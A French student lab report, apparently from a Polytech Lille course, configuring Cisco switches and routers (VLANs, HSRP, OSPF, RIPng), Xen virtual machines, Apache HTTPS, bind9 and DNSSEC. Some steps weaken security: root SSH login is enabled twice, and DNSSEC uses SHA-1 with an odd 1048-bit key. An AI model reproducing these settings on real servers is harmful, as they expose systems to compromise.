Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
